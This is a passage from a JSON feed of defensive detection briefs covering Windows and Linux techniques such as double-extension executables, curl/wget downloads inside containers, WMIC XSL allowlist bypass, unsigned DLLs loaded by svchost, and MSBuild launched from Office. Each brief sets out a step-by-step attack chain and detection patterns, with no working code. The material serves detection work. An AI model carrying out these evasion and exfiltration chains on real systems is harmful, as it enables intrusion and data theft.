can lead to arbitrary code execution on the victim\u0026rsquo;s machine, potentially resulting in data theft, malware installation, or complete system compromise. While the number of affected organizations is not specified, the technique is broadly applicable to any Windows environment where users handle archive files, potentially affecting numerous individuals and organizations across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the execution of wscript.exe and its arguments.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Script Execution from Archive\u0026rdquo; to your SIEM to identify suspicious script execution patterns.\u003c/li\u003e\n\u003cli\u003eMonitor process activity for wscript.exe and other scripting engines executing from temporary directories.\u003c/li\u003e\n\u003cli\u003eConfigure endpoint security solutions to block execution of scripts from common temporary directories.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-script-exec-archive/","summary":"This rule identifies attempts to execute Jscript/Vbscript files from an archive file, a common delivery method for malicious scripts on Windows systems.","title":"Windows Script Execution from Archive File","url":"https://feed.craftedsignal.io/briefs/2024-01-script-exec-archive/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","CrowdStrike"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","masquerading","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft"],"content_html":"\u003cp\u003eAdversaries may use masquerading techniques to evade defenses and blend into the environment by manipulating the name or 
location of a file, tricking users into executing malicious code disguised as a benign file type. This rule detects the creation of executable files with multiple extensions, a common method of masquerading. The rule focuses on identifying suspicious file creations that use misleading extensions, specifically targeting files with an \u0026ldquo;.exe\u0026rdquo; extension preceded by common benign extensions. It excludes known legitimate processes to minimize false positives. This activity is relevant for defenders to identify potential threats where adversaries attempt to bypass security measures by disguising malicious files.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious executable file with a double extension (e.g., \u0026ldquo;document.pdf.exe\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eThe attacker delivers the malicious file to the target system via phishing or other means.\u003c/li\u003e\n\u003cli\u003eThe user downloads or receives the file and attempts to open it.\u003c/li\u003e\n\u003cli\u003eWindows displays the file with the first extension (\u0026ldquo;document.pdf\u0026rdquo;) by default, misleading the user.\u003c/li\u003e\n\u003cli\u003eUpon execution, Windows recognizes the \u0026ldquo;.exe\u0026rdquo; extension and executes the file.\u003c/li\u003e\n\u003cli\u003eThe malicious executable runs, potentially deploying malware or performing other unauthorized actions.\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence or attempts lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to malware infection, data breaches, and system compromise. 
This technique bypasses common file type restrictions and user awareness, potentially affecting a wide range of users and systems. While the number of victims is not specified, the impact can be significant, particularly in organizations where users handle sensitive data. The affected sectors are broad, encompassing any organization where users are susceptible to social engineering attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Executable File Creation with Multiple Extensions\u0026rdquo; to your SIEM and tune for your environment to detect the creation of suspicious files with multiple extensions.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 11 (File Create) for comprehensive file creation monitoring to improve the effectiveness of the detection rule.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and logging for similar file creation activities to improve detection and response capabilities.\u003c/li\u003e\n\u003cli\u003eEducate users on the risks associated with double file extensions and encourage caution when opening attachments from unknown sources.\u003c/li\u003e\n\u003cli\u003eReview and whitelist legitimate software installations that may create executables with multiple extensions to reduce false positives, as described in the rule\u0026rsquo;s triage notes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-executable-file-creation-multiple-extensions/","summary":"Detection of executable files created with multiple extensions, a masquerading technique to evade defenses.","title":"Executable File Creation with Multiple Extensions","url":"https://feed.craftedsignal.io/briefs/2024-01-executable-file-creation-multiple-extensions/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Auditd 
Manager"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","container","auditd","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies instances of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e being executed from within containers managed by \u003ccode\u003erunc\u003c/code\u003e on Linux systems. The rule leverages Auditd Manager to monitor system calls and flags processes running with the title \u003ccode\u003erunc init\u003c/code\u003e that then execute \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e. This activity is noteworthy because attackers often use these tools to download malicious payloads (stagers, scripts, implants) or to exfiltrate data after compromising a container. While these tools can be used legitimately within containers, their execution in the context of \u003ccode\u003erunc init\u003c/code\u003e suggests a higher risk of malicious activity. The rule focuses on narrowing the signal to the container runtime boundary where unexpected download clients are more worthy of review. 
The rule specifically leverages Auditd Manager for data collection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a host system, possibly through exploiting a vulnerability in an application running outside the container (e.g., web application).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a containerized application running on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability within the container, or abuses a privileged workload within the container, to gain elevated privileges or code execution within the container.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download additional tools or scripts into the container. These tools might include reverse shells, credential dumping tools, or data exfiltration utilities.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded tools to further compromise the container or the underlying host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to stage data for exfiltration to an external server. This may involve compressing and encoding data before transmission.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates the data exfiltration process using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to send the staged data to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, which could include data theft, system disruption, or further lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised containers can lead to data breaches, service disruptions, and further attacks on internal systems. 
Successful exploitation could allow attackers to steal sensitive data, install malware, or pivot to other parts of the network, impacting confidentiality, integrity, and availability. The number of affected systems depends on the scope of the container deployment and the privileges granted to the compromised container.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Curl or Wget Execution from Container Context\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Auditd Manager with syscall coverage including \u003ccode\u003eexecve\u003c/code\u003e to capture process execution and arguments within containers, as mentioned in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts from this rule with network logs to identify the destination IP addresses and domains contacted by the compromised container.\u003c/li\u003e\n\u003cli\u003eBaseline trusted images and exclude stable image digests or namespaces when noisy to reduce false positives, as suggested in the rule\u0026rsquo;s false positives section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-23T12:00:00Z","date_published":"2024-01-23T12:00:00Z","id":"/briefs/2024-01-curl-wget-container-execution/","summary":"This rule detects the execution of curl or wget from within runc-backed containers on Linux systems monitored by Auditd Manager, indicating potential ingress tool transfer or data exfiltration by attackers who have compromised the container.","title":"Curl or Wget Execution from Container Context","url":"https://feed.craftedsignal.io/briefs/2024-01-curl-wget-container-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic 
Defend"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries, such as jscript.dll or vbscript.dll, it may be indicative of an allowlist bypass. Adversaries exploit WMIC to bypass security measures by executing scripts via XSL files. This technique is often used for defense evasion and execution of malicious code. The detection logic focuses on monitoring WMIC executions with atypical arguments (format*:*, /format*:*, *-format*:*) in conjunction with the loading of scripting libraries, indicating potential misuse. The rule is designed for data generated by Elastic Defend and also supports Sysmon data sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through various means (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eThe attacker executes WMIC.exe or wmic.exe with suspicious arguments such as \u0026ldquo;format*:*\u0026rdquo;, \u0026ldquo;/format*:*\u0026rdquo;, or \u0026ldquo;*-format*:*\u0026rdquo; to leverage XSL script processing.\u003c/li\u003e\n\u003cli\u003eWMIC attempts to load scripting libraries like jscript.dll or vbscript.dll to enable script execution.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the loaded scripting libraries to execute malicious code embedded in an XSL file.\u003c/li\u003e\n\u003cli\u003eThe script performs various malicious actions, such as downloading additional payloads, modifying system configurations, or escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the WMI functionality for lateral movement or 
persistence within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker evades detection by abusing trusted system binaries (WMIC) and allowlisted scripting engines.\u003c/li\u003e\n\u003cli\u003eThe final objective is to achieve code execution and maintain control over the compromised system for data exfiltration or further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to bypass security measures and execute malicious code on compromised systems. This can lead to a range of adverse effects, including data theft, system compromise, and further propagation of malware within the network. The use of WMIC for defense evasion can make it difficult to detect malicious activity, increasing the risk of successful attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious WMIC XSL Script Execution\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 7 (Image Loaded) logging to activate the Sigma rule above.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule by reviewing process execution details and command-line arguments.\u003c/li\u003e\n\u003cli\u003eReview the parent process of suspicious WMIC executions to understand the context and origin of the activity.\u003c/li\u003e\n\u003cli\u003eCorrelate the process.entity_id with other related events within a 2-minute window to identify any additional suspicious activities.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or suspicious XSL files and 
scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-22T12:00:00Z","date_published":"2024-01-22T12:00:00Z","id":"/briefs/2024-01-22-wmic-xsl-script-execution/","summary":"This rule detects suspicious execution of scripts via WMIC, potentially used for allowlist bypass, by identifying WMIC executions with atypical arguments and the loading of specific libraries like jscript.dll or vbscript.dll for defense evasion and execution.","title":"Suspicious WMIC XSL Script Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-22-wmic-xsl-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["persistence","defense-evasion","execution","windows","dll-injection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eAttackers may attempt to load malicious, unsigned DLLs into \u003ccode\u003esvchost.exe\u003c/code\u003e, a legitimate Windows service host process, to maintain persistence or escalate privileges. This technique abuses the shared service host process to execute arbitrary code with SYSTEM privileges. The \u003ccode\u003esvchost.exe\u003c/code\u003e process, which typically hosts multiple Windows services, can be targeted to load malicious DLLs from unusual file paths, potentially bypassing security measures that rely on code signing validation. This is especially concerning because \u003ccode\u003esvchost.exe\u003c/code\u003e is a trusted process, making detection more challenging. 
The loading of unsigned DLLs by \u003ccode\u003esvchost.exe\u003c/code\u003e from atypical directories is a strong indicator of potential malicious activity, as legitimate Windows services rarely load unsigned libraries from such locations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn adversary gains initial access to the system through an undisclosed method (e.g., exploitation of a vulnerability or social engineering).\u003c/li\u003e\n\u003cli\u003eThe attacker creates a malicious, unsigned DLL on the compromised system in a non-standard directory like \u003ccode\u003eC:\\ProgramData\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the Windows Registry to configure a service hosted by \u003ccode\u003esvchost.exe\u003c/code\u003e to load the malicious DLL. This often involves manipulating service dependencies or service parameters.\u003c/li\u003e\n\u003cli\u003eThe system is restarted, or the targeted service is manually restarted, causing \u003ccode\u003esvchost.exe\u003c/code\u003e to load the specified DLL.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esvchost.exe\u003c/code\u003e executes the code within the malicious DLL, now running with the privileges of the hosted service (typically SYSTEM).\u003c/li\u003e\n\u003cli\u003eThe malicious DLL performs actions such as installing backdoors, escalating privileges further, or establishing command and control (C2) communication.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established C2 channel to remotely control the compromised system, exfiltrate data, or perform other malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the system by ensuring the malicious DLL is loaded each time the service or system starts.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to gain persistent access to the 
compromised system with elevated (SYSTEM) privileges. This can lead to complete system compromise, data theft, installation of backdoors, and lateral movement within the network. The use of \u003ccode\u003esvchost.exe\u003c/code\u003e as a host for malicious DLLs makes detection more difficult, allowing attackers to operate undetected for extended periods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect unsigned DLLs loaded by \u003ccode\u003esvchost.exe\u003c/code\u003e, focusing on the specified file paths and code signature status.\u003c/li\u003e\n\u003cli\u003eExamine \u003ccode\u003edll.Ext.relative_file_creation_time\u003c/code\u003e to identify DLLs created shortly before being loaded to catch newly created malicious files.\u003c/li\u003e\n\u003cli\u003eReview and validate the legitimacy of all DLLs loaded by \u003ccode\u003esvchost.exe\u003c/code\u003e, focusing on those located in unusual paths.\u003c/li\u003e\n\u003cli\u003eUpdate endpoint detection and response (EDR) systems to specifically monitor for the loading of unsigned DLLs by system processes like \u003ccode\u003esvchost.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eContinuously update the exclusion list of known good DLL hashes to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:30:00Z","date_published":"2024-01-09T18:30:00Z","id":"/briefs/2024-01-unsigned-dll-svchost/","summary":"Adversaries may load unsigned DLLs into svchost.exe to establish persistence or escalate privileges, leveraging a shared Windows service to execute malicious code with elevated permissions.","title":"Unsigned DLL Loaded by Svchost for Persistence and Privilege Escalation","url":"https://feed.craftedsignal.io/briefs/2024-01-unsigned-dll-svchost/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic 
Defend"],"_cs_severities":["low"],"_cs_tags":["persistence","execution","command-and-control","web shell","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule focuses on identifying potentially malicious activity stemming from Linux-based web servers. The rule is triggered when a web server process, such as Apache, Nginx, or others, initiates an outbound network connection to a destination port that is considered non-standard. This activity can signal the presence of a web shell, a malicious script uploaded to a web server to enable remote access and control. Attackers may exploit compromised web servers to establish covert communication channels, exfiltrate data, or launch further attacks on internal systems. The rule leverages data from Elastic Defend to monitor network connections and filter out legitimate traffic based on a predefined list of common ports and internal IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained via exploitation of a vulnerability in a web application or web server component running on a Linux system (e.g., through SQL injection or remote code execution).\u003c/li\u003e\n\u003cli\u003eA web shell is uploaded to the compromised web server, often disguised as a legitimate file or hidden within existing directories.\u003c/li\u003e\n\u003cli\u003eThe attacker interacts with the web shell through HTTP requests, using it as a command and control interface.\u003c/li\u003e\n\u003cli\u003eThe web shell executes commands on the server, initiating outbound network connections to non-standard ports.\u003c/li\u003e\n\u003cli\u003eThese connections may be used to communicate with external C2 servers, download additional payloads, or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the web shell to move laterally within the network, targeting other systems and 
services.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to establish persistence on the compromised server, ensuring continued access even after system reboots.\u003c/li\u003e\n\u003cli\u003eThe final objective is data theft, system compromise, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised web servers can lead to significant data breaches, system downtime, and reputational damage. While this rule triggers on low-severity behavior, successful exploitation can lead to complete system compromise. The number of affected systems depends on the scope of the initial vulnerability and the attacker\u0026rsquo;s ability to move laterally. Organizations in all sectors that rely on web-based applications are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect web server processes initiating connections to unusual destination ports and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend integration to collect the necessary network event data from Linux endpoints to activate the rule.\u003c/li\u003e\n\u003cli\u003eReview and customize the list of excluded destination ports and internal IP ranges in the Sigma rule to match your organization\u0026rsquo;s specific network configuration and legitimate traffic patterns.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule to determine if the activity is malicious or benign, focusing on the process name, user, destination IP, and destination port.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:28:00Z","date_published":"2024-01-09T18:28:00Z","id":"/briefs/2024-01-uncommon-web-server-port/","summary":"The rule identifies unusual outbound network connections on non-standard ports originating from web server processes on Linux systems, 
indicative of potential web shell activity or unauthorized communication.","title":"Uncommon Destination Port Connection by Web Server on Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-uncommon-web-server-port/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Build Engine","Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","msbuild","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a software build platform commonly used by Windows developers. When MSBuild is started by an Office application like Word or Excel, it deviates from typical usage patterns. This behavior can be indicative of a malicious document executing a script payload as part of a defense evasion tactic. Attackers may leverage MSBuild to execute code or perform actions that would otherwise be blocked or detected. This activity is particularly concerning because it can bypass traditional security measures that focus on blocking suspicious executables or scripts directly launched by Office applications. The rule was created in March 2020, and last updated in April 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious Office document (e.g., Word, Excel, PowerPoint).\u003c/li\u003e\n\u003cli\u003eThe Office document contains an embedded macro or exploit that triggers the execution of MSBuild.exe.\u003c/li\u003e\n\u003cli\u003eMSBuild.exe is launched as a child process of the Office application (e.g., winword.exe, excel.exe, powerpnt.exe).\u003c/li\u003e\n\u003cli\u003eMSBuild executes a project file or inline task specified in the command line. 
This can involve compiling code, executing scripts, or performing other actions.\u003c/li\u003e\n\u003cli\u003eThe executed code or script performs malicious activities, such as downloading additional payloads, modifying system settings, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eMSBuild may spawn child processes, such as cmd.exe, powershell.exe, or other utilities, to further execute malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which could include data exfiltration, installing malware, or gaining unauthorized access to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary code on the victim\u0026rsquo;s machine, potentially resulting in data theft, malware installation, or complete system compromise. Since MSBuild is a legitimate Microsoft tool, its use by malicious actors can make detection more challenging. The impact is high because it leverages a trusted process to carry out malicious activities, evading standard security measures.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Started by an Office Application\u0026rdquo; to your SIEM to detect this specific behavior based on process creation events.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with the appropriate configuration to capture the necessary process start events for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the command-line arguments of MSBuild.exe and the parent process information, including the executable name and command line.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for MSBuild.exe with parent processes being Office applications as a high priority indicator of 
potential compromise.\u003c/li\u003e\n\u003cli\u003eReview and harden Office macro settings to prevent execution of malicious macros.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:22:00Z","date_published":"2024-01-09T18:22:00Z","id":"/briefs/2024-01-msbuild-office-app/","summary":"The Microsoft Build Engine (MSBuild) being started by an Office application is unusual behavior and could indicate a malicious document executing a script payload for defense evasion.","title":"Microsoft Build Engine Started by an Office Application","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-office-app/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["WINWORD.EXE","EXCEL.EXE","POWERPNT.EXE","MSPUB.EXE","MSACCESS.EXE"],"_cs_severities":["medium"],"_cs_tags":["wmi","image load","office","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious image loading of \u003ccode\u003ewmiutils.dll\u003c/code\u003e from Microsoft Office processes (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, MSPUB.EXE, MSACCESS.EXE). Adversaries can use this technique to execute code and evade traditional parent/child processes spawned from Microsoft Office products. 
This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser opens a malicious Microsoft Office document (e.g., Word, Excel).\u003c/li\u003e\n\u003cli\u003eThe document contains a macro or exploit that triggers the execution of WMI commands.\u003c/li\u003e\n\u003cli\u003eThe Office application spawns a WMI process or utilizes existing WMI infrastructure.\u003c/li\u003e\n\u003cli\u003eThe WMI process loads the \u003ccode\u003ewmiutils.dll\u003c/code\u003e library, which is unusual for normal Office operations.\u003c/li\u003e\n\u003cli\u003eThe WMI commands execute malicious code, potentially downloading or executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence through WMI event subscriptions or other methods.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement using WMI to execute commands on other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, establish persistence, and move laterally within the network, potentially leading to data exfiltration, system compromise, or ransomware deployment. 
While the number of victims is unknown, this technique can be used in targeted attacks against organizations that heavily rely on Microsoft Office applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious WMI Image Load from MS Office\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon event ID 7 (Image Loaded) logging for comprehensive image load monitoring as suggested in the \u003ca href=\"https://ela.st/sysmon-event-7-setup\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for Microsoft Office applications spawning WMI-related processes (e.g., \u003ccode\u003ewbemtest.exe\u003c/code\u003e, \u003ccode\u003ewmic.exe\u003c/code\u003e) to detect potential WMI abuse.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit lateral movement in case of a successful WMI-based attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T12:00:00Z","date_published":"2024-01-09T12:00:00Z","id":"/briefs/2024-01-suspicious-wmi-image-load/","summary":"Adversaries may exploit Windows Management Instrumentation (WMI) to execute code stealthily, bypassing traditional security measures by loading `wmiutils.dll` from Microsoft Office applications, potentially indicating malicious execution.","title":"Suspicious WMI Image Load from MS Office","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-wmi-image-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["low"],"_cs_tags":["execution","initial-access","defense-evasion","discovery"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eAttackers are increasingly leveraging PDF reader applications as an initial access vector, exploiting vulnerabilities within these programs or using social engineering to 
trick users into opening malicious PDF documents. Upon successful exploitation, adversaries often spawn built-in Windows utilities from the compromised PDF reader process to perform reconnaissance, escalate privileges, or establish persistence. This activity is designed to blend in with normal system operations, making it difficult to detect without specific monitoring and detection rules. The targeted software commonly includes Adobe Acrobat, Adobe Reader, and Foxit Reader. Defenders should be vigilant for unexpected child processes of PDF readers, especially command-line interpreters and system administration tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user receives a malicious PDF document via phishing or other means.\u003c/li\u003e\n\u003cli\u003eThe user opens the PDF document using a vulnerable PDF reader application (e.g., Adobe Acrobat, Foxit Reader).\u003c/li\u003e\n\u003cli\u003eThe PDF document exploits a vulnerability or uses a malicious script to execute an arbitrary command.\u003c/li\u003e\n\u003cli\u003eThe PDF reader application spawns a command-line interpreter (e.g., cmd.exe, powershell.exe) or a system administration tool (e.g., reg.exe, net.exe).\u003c/li\u003e\n\u003cli\u003eThe spawned process executes commands to gather system information (e.g., ipconfig.exe, systeminfo.exe, whoami.exe).\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to discover network configuration, user accounts, or running processes.\u003c/li\u003e\n\u003cli\u003eThe attacker could leverage the spawned process to download and execute further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a foothold on the system and can proceed with lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of PDF reader applications can lead to initial access, 
privilege escalation, and further compromise of the affected system. While individual incidents may have a low risk score, widespread exploitation can lead to significant data breaches, system downtime, and reputational damage. The use of legitimate system utilities for malicious purposes can make detection challenging, allowing attackers to operate undetected for extended periods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the execution of suspicious child processes (Sysmon Event ID 1, Windows Security Event Logs).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious PDF Reader Child Process\u0026rdquo; to your SIEM and tune for your environment to detect the execution of suspicious processes spawned by PDF reader applications.\u003c/li\u003e\n\u003cli\u003eMonitor for network connections originating from PDF reader applications to unusual or external IP addresses.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or unknown executables.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T18:45:00Z","date_published":"2024-01-04T18:45:00Z","id":"/briefs/2024-01-suspicious-pdf-child-process/","summary":"Adversaries may exploit PDF reader applications to execute arbitrary commands and establish a foothold within a system, often launching built-in utilities for reconnaissance and privilege escalation.","title":"Suspicious PDF Reader Child Process Activity","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-pdf-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["phishing","execution","url-file","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eAttackers commonly use .url shortcut files in phishing 
